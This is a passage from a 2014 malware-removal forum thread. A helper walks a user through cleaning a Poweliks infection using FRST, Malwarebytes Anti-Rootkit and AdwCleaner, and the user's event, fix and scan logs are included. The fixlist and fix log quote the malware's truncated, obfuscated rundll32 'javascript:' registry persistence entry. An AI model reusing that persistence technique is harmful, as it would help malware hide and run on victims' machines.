Error: (12/17/2014 09:05:30 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

Error: (12/17/2014 08:59:58 AM) (Source: Sophos Message Router) (EventID: 8005) (User: NT AUTHORITY)
Description: DNS lookup failure trying to resolve the following addresses: LN-CO-AVS01,LN-CO-AVS01.london.autodata.net.%%3

Error: (12/17/2014 08:54:28 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (12/17/2014 08:35:39 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

Error: (12/17/2014 08:27:12 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

Error: (12/17/2014 04:50:55 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

Error: (12/16/2014 09:41:20 PM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

Error: (12/16/2014 09:31:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17041, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17107, time stamp: 0x536855c9
Exception code: 0xc00000fd
Fault offset: 0x000b816f
Faulting process id: 0x3cb8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (12/16/2014 07:13:45 PM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

System errors:
=============
Error: (12/17/2014 10:07:19 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.

Error: (12/17/2014 08:59:41 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.

Error: (12/17/2014 08:57:46 AM) (Source: TermService) (EventID: 1067) (User: )
Description: The terminal server cannot register 'TERMSRV' Service Principal Name to be used for server authentication. The following error occured: The specified domain either does not exist or could not be contacted.
.

Error: (12/17/2014 08:55:38 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/17/2014 08:54:31 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: ADMS_NT)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.

Error: (12/17/2014 08:53:33 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1055) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows could not resolve the computer name. This could be caused by one of more of the following:
a) Name Resolution failure on the current domain controller.
b) Active Directory Replication Latency (an account created on another domain controller has not replicated to the current domain controller).

Error: (12/17/2014 08:53:31 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain ADMS_NT due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.

ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.

Error: (12/17/2014 07:47:53 AM) (Source: Ntfs) (EventID: 55) (User: )
Description: The file system structure on the disk is corrupt and unusable.
Please run the chkdsk utility on the volume OSDisk.

Error: (12/17/2014 07:47:52 AM) (Source: Ntfs) (EventID: 55) (User: )
Description: The file system structure on the disk is corrupt and unusable.
Please run the chkdsk utility on the volume OSDisk.

Error: (12/17/2014 07:47:51 AM) (Source: Ntfs) (EventID: 55) (User: )
Description: The file system structure on the disk is corrupt and unusable.
Please run the chkdsk utility on the volume OSDisk.

Microsoft Office Sessions:
=========================
Error: (12/17/2014 10:09:07 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description:

Error: (12/17/2014 09:05:30 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description:

Error: (12/17/2014 08:59:58 AM) (Source: Sophos Message Router) (EventID: 8005) (User: NT AUTHORITY)
Description: LN-CO-AVS01,LN-CO-AVS01.london.autodata.net

Error: (12/17/2014 08:54:28 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (12/17/2014 08:35:39 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description:

Error: (12/17/2014 08:27:12 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description:

Error: (12/17/2014 04:50:55 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description:

Error: (12/16/2014 09:41:20 PM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description:

Error: (12/16/2014 09:31:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.170414a5bc6b7MSHTML.dll11.0.9600.17107536855c9c00000fd000b816f3cb801d019a0b5fc9a47C:\Program Files\Internet Explorer\iexplore.exeC:\windows\system32\MSHTML.dllc88588fa-8594-11e4-aa64-ac728900c61a

Error: (12/16/2014 07:13:45 PM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description:

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-2410M CPU @ 2.30GHz
Percentage of memory in use: 91%
Total physical RAM: 4003.18 MB
Available physical RAM: 331.73 MB
Total Pagefile: 8676.54 MB
Available Pagefile: 783 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: (OSDisk) (Fixed) (Total:297.6 GB) (Free:202.88 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: A47B9598)
Partition 1: (Active) - (Size=499 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.6 GB) - (Type=07 NTFS)

==================== End Of Log ============================

**Juliet** · 2014-12-18, 12:46

Running from C:\Users\gluskid\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2PB313KY

We can't use FRST running from this directory.

I'll post instructions on saving files to desktop, then I'll have you download Farbar Recovery Scan Tool again.

- Save ALL Tools to your Desktop-

All tools that I have you download should be placed on the desktop unless otherwise stated. If you are familiar with how to save files to the desktop then you can skip this step.

Since you are continuing with this step then I assume you are unfamiliar with saving files to your desktop. As a result it's easiest if you configure your browser(s) to download any tools to the desktop by default. Please use the appropriate instructions below depending on the browser you are using.

Google Chrome - Click the "Customize and control Google Chrome" button in the upper right-corner of the browser.

Choose Settings. at the bottom of the screen click the
"Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.

Mozilla Firefox - Click the "Open Menu" button in the upper right-corner of the browser.

Choose Options. In the downloads section, click the Browse button, click on the Desktop folder
and the click the "Select Folder" button. Click OK to get out of the Options menu.

Internet Explorer - Click the Tools menu in the upper right-corner of the browser.
Select View downloads. Select the Options link in the lower left of the window. Click Browse and
select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.

~~~~~~~~~~~~`

Farbar Recovery Scan Tool (FRST) Scan

Please download Farbar Recovery Scan Tool (x32) or Farbar Recovery Scan Tool (x64) andsave the file to your Desktop.
Note: Download and run the version compatible with your system (32 or 64-bit). Download both if you're unsure; only one will run.

Don't do anything. I need it on desktop to run the fix.

~~~~~~~~~~~~~~~~`

Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. save it to the Desktop as fixlist.txt
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)

start
CloseProcesses:
HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
CustomCLSID: HKU\S-1-5-21-2118340153-1145135853-813105556-21214_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
EmptyTemp:
Hosts:
End

Open FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

~~~~~~~~~~~~~~~~~~~~~~~~~

Malwarebytes Anti-Rootkit

Download Malwarebytes Anti-Rootkit
Once the file has been downloaded, right click on the downloaded file and select the Extract all menu option.
Follow the instructions to extract the ZIP file to a folder called mbar-versionnumber on your desktop.
Once the ZIP file has been extracted, open the folder and when that folder opens, double-click on the mbar folder.
Double-click on the mbar.exe file to launch Malwarebytes Anti-Rootkit.
After you double-click on the mbar.exe file, you may receive a User Account Control (UAC) message if you are sure you wish to allow the program to run. Please allow to start Malwarebytes Anti-Rootkit correctly.
Malwarebytes Anti-Rootkit will now install necessary drivers that are required for the program to operate correctly.
If you receive a DDA driver message like could not load DDA driver, click on the Yes button and Malwarebytes Anti-Rootkit will now restart your computer and will start automatically.

Please click by the introduction screen on the Next button to continue.

Next you will see the Update Database screen.
Click on the Update button so Malwarebytes Anti-Rootkit can download the latest definition updates.

When the update has finished, click on the Next button.

Next you can select some basic scanning options. Make sure the Drivers, Sectors, and System scan targets are selected before you click on the Scan button.
Malwarebytes Anti-Rootkit will now start scanning your computer for rootkits. This scan can take some time, so please be patient.

When the scan with Malwarebytes Anti-Rootkit is finished, the program will display a screen with the results from the scan.
Make sure everything is selected and that the option to create a restore point is checked.
Next click on the Cleanup button. Malwarebytes Anti-Rootkit will then prompt you to reboot your computer.
Click on Yes button to restart your computer.

There will now be two log files created in the mbar folder called system-log.txt and one that starts with mbar-log.
The mbar-log file will always start with mbar-log, but the rest will be named using a timestamp indicating the time it was run.
- For example, mbar-log-2012-11-12 (19-13-32).txt corresponds to mbar-log-year-month-day (hour-minute-second).txt.
The system-log.txt contains information about each time you have run MBAR and contains diagnostic information from the program.

Please post
Fixlog.txt
Malwarebytes Anti-Rootkit log

**gludog** · 2014-12-18, 15:40

Thanks for your help so far, here are the logs:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 17-12-2014
Ran by gluskid at 2014-12-18 07:41:33 Run:1
Running from C:\Users\gluskid\Desktop
Loaded Profiles: gluskid & Administrator (Available profiles: gluskid & Administrator)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
CloseProcesses:
HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
CustomCLSID: HKU\S-1-5-21-2118340153-1145135853-813105556-21214_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
HKU\S-1-5-21-2118340153-1145135853-813105556-21214\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisallowRun => value deleted successfully.
"HKU\S-1-5-21-2118340153-1145135853-813105556-21214\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-2118340153-1145135853-813105556-21214\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}" => Key deleted successfully.
"HKCR\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key deleted successfully.
"HKCR\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key deleted successfully.
"HKU\S-1-5-21-2118340153-1145135853-813105556-21214_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
Hosts was reset successfully.
EmptyTemp: => Removed 2.3 GB temporary data.

The system needed a reboot.

==== End of Fixlog ====

Malwarebytes Anti-Rootkit BETA 1.08.2.1001
www.malwarebytes.org

Database version: v2014.12.18.02

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.17107
gluskid :: GLUSKID-LT [administrator]

12/18/2014 9:15:48 AM
mbar-log-2014-12-18 (09-15-48).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 404243
Time elapsed: 17 minute(s), 50 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)

Malwarebytes Anti-Rootkit BETA 1.08.2.1001

(c) Malwarebytes Corporation 2011-2012

OS version: 6.1.7601 Windows 7 Service Pack 1 x64

Account is Administrative

Internet Explorer version: 11.0.9600.17107

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 2.294000 GHz
Memory total: 4197638144, free: 2413350912

=======================================

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.08.2.1001

(c) Malwarebytes Corporation 2011-2012

OS version: 6.1.7601 Windows 7 Service Pack 1 x64

Account is Administrative

Internet Explorer version: 11.0.9600.17107

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 2.294000 GHz
Memory total: 4197638144, free: 2422587392

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.08.2.1001

(c) Malwarebytes Corporation 2011-2012

OS version: 6.1.7601 Windows 7 Service Pack 1 x64

Account is Administrative

Internet Explorer version: 11.0.9600.17107

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 2.294000 GHz
Memory total: 4197638144, free: 2438320128

Downloaded database version: v2014.12.18.02
Downloaded database version: v2014.12.14.01
Downloaded database version: v2014.12.06.01
=======================================
Initializing...
This version of Malwarebytes Anti-Rootkit requires you to completely exit the Malwarebytes Anti-Malware application to continue.
=======================================
Initializing...
------------ Kernel report ------------
12/18/2014 09:15:27
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kdcom.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\CLFS.SYS
\SystemRoot\system32\CI.dll
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\system32\drivers\ACPI.sys
\SystemRoot\system32\drivers\WMILIB.SYS
\SystemRoot\system32\drivers\msisadrv.sys
\SystemRoot\system32\drivers\pci.sys
\SystemRoot\system32\drivers\vdrvroot.sys
\SystemRoot\system32\drivers\iusb3hcs.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\system32\drivers\compbatt.sys
\SystemRoot\system32\drivers\BATTC.SYS
\SystemRoot\system32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\system32\drivers\iaStor.sys
\SystemRoot\system32\DRIVERS\iaStorA.sys
\SystemRoot\system32\DRIVERS\storport.sys
\SystemRoot\system32\drivers\amdxata.sys
\SystemRoot\system32\drivers\fltmgr.sys
\SystemRoot\system32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\Ntfs.sys
\SystemRoot\System32\Drivers\msrpc.sys
\SystemRoot\System32\Drivers\ksecdd.sys
\SystemRoot\System32\Drivers\cng.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\system32\drivers\vmstorfl.sys
\SystemRoot\system32\drivers\volsnap.sys
\SystemRoot\system32\DRIVERS\stdcfltn.sys
\SystemRoot\System32\Drivers\spldr.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\system32\drivers\iaStorF.sys
\SystemRoot\System32\drivers\hwpolicy.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\system32\drivers\disk.sys
\SystemRoot\system32\drivers\CLASSPNP.SYS
\SystemRoot\system32\drivers\amdkmpfd.sys
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\system32\DRIVERS\savonaccess.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\drivers\VIDEOPRT.SYS
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\system32\drivers\rdpencdd.sys
\SystemRoot\system32\drivers\rdprefmp.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\DRIVERS\scfndis.sys
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\DRIVERS\netbt.sys
\??\C:\windows\system32\Drivers\scfdriver.sys
\SystemRoot\system32\DRIVERS\wfplwf.sys
\SystemRoot\system32\DRIVERS\pacer.sys
\SystemRoot\system32\DRIVERS\vwififlt.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\DRIVERS\termdd.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\system32\DRIVERS\mssmbios.sys
\SystemRoot\System32\drivers\discache.sys
\SystemRoot\system32\drivers\csc.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\blbdrive.sys
\SystemRoot\system32\DRIVERS\tunnel.sys
\SystemRoot\system32\DRIVERS\igdkmd64.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\dxgmms1.sys
\SystemRoot\system32\DRIVERS\TeeDriverx64.sys
\SystemRoot\system32\DRIVERS\usbehci.sys
\SystemRoot\system32\DRIVERS\USBPORT.SYS
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\Rt64win7.sys
\SystemRoot\system32\DRIVERS\NETwsw00.sys
\SystemRoot\system32\DRIVERS\vwifibus.sys
\SystemRoot\system32\DRIVERS\nusb3xhc.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\DRIVERS\i8042prt.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\ST_Accel.sys
\SystemRoot\system32\DRIVERS\intelppm.sys
\SystemRoot\system32\DRIVERS\CmBatt.sys
\SystemRoot\system32\DRIVERS\wmiacpi.sys
\SystemRoot\system32\DRIVERS\CompositeBus.sys
\SystemRoot\system32\DRIVERS\AgileVpn.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\rassstp.sys
\SystemRoot\system32\DRIVERS\rdpbus.sys
\SystemRoot\system32\DRIVERS\swenum.sys
\SystemRoot\system32\DRIVERS\ks.sys
\SystemRoot\system32\DRIVERS\umbus.sys
\SystemRoot\system32\DRIVERS\usbhub.sys
\SystemRoot\system32\DRIVERS\nusb3hub.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\drivers\HdAudio.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\system32\DRIVERS\IntcDAud.sys
\SystemRoot\System32\Drivers\BTHUSB.sys
\SystemRoot\System32\Drivers\bthport.sys
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\System32\Drivers\usbvideo.sys
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\system32\DRIVERS\WinUSB.sys
\SystemRoot\system32\DRIVERS\rfcomm.sys
\SystemRoot\system32\DRIVERS\BthEnum.sys
\SystemRoot\system32\DRIVERS\bthpan.sys
\SystemRoot\system32\DRIVERS\USBSTOR.SYS
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\Drivers\dump_diskdump.sys
\SystemRoot\System32\Drivers\dump_iaStorA.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\system32\DRIVERS\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\cdd.dll
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\DRIVERS\lltdio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\DRIVERS\rspndr.sys
\SystemRoot\system32\DRIVERS\vwifimp.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\Drivers\secdrv.SYS
\SystemRoot\System32\DRIVERS\srvnet.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\System32\drivers\rdpdr.sys
\SystemRoot\system32\drivers\tdtcp.sys
\SystemRoot\System32\DRIVERS\tssecsrv.sys
\SystemRoot\System32\Drivers\RDPWD.SYS
\SystemRoot\system32\drivers\WudfPf.sys
\SystemRoot\system32\DRIVERS\WUDFRd.sys
\SystemRoot\system32\DRIVERS\asyncmac.sys
\??\C:\windows\system32\drivers\mbamchameleon.sys
\??\C:\windows\system32\drivers\MBAMSwissArmy.sys
\Windows\System32\ntdll.dll
\Windows\System32\smss.exe
\Windows\System32\apisetschema.dll
----------- End -----------
Done!
<<<1>>>
Upper Device Name: \Device\Harddisk1\DR1
Upper Device Object: 0xfffffa8006da2300
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\0000008d\
Lower Device Object: 0xfffffa8006dabb60
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xfffffa80046f4060
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000062\
Lower Device Object: 0xfffffa80046b19c0
Lower Device Driver Name: \Driver\iaStorA\
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xfffffa80046f4060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa80046f4b90, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa80046f4060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa80045edc20, DeviceName: Unknown, DriverName: \Driver\stdcfltn\
DevicePointer: 0xfffffa80045ec950, DeviceName: Unknown, DriverName: \Driver\iaStorF\
DevicePointer: 0xfffffa80046b8e40, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa80046b19c0, DeviceName: \Device\00000062\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: A47B9598

Partition information:

Partition 0 type is Primary (0x7)
Partition is ACTIVE.
Partition starts at LBA: 2048 Numsec = 1021952
Partition file system is NTFS
Partition is bootable

Partition 1 type is Primary (0x7)
Partition is NOT ACTIVE.
Partition starts at LBA: 1024000 Numsec = 624115712

Partition 2 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0

Partition 3 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0

Disk Size: 320072933376 bytes
Sector size: 512 bytes

Done!
Physical Sector Size: 0
Drive: 1, DevicePointer: 0xfffffa8006da2300, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa8007b06040, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa8006da2300, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa8006c6e040, DeviceName: Unknown, DriverName: \Driver\iaStorF\
DevicePointer: 0xfffffa8006dabb60, DeviceName: \Device\0000008d\, DriverName: \Driver\USBSTOR\
------------ End ----------
Scan finished
=======================================

Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removal finished

**Juliet** · 2014-12-18, 15:57

OK, looks good.

-AdwCleaner-by Xplode

Click on this link to download : ADWCleaner
Click on ONE of the Two Blue Download Now buttons That have a blue arrow beside them and save it to your desktop.

Do not click on any links in the top Advertisment.

Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click on Scan.
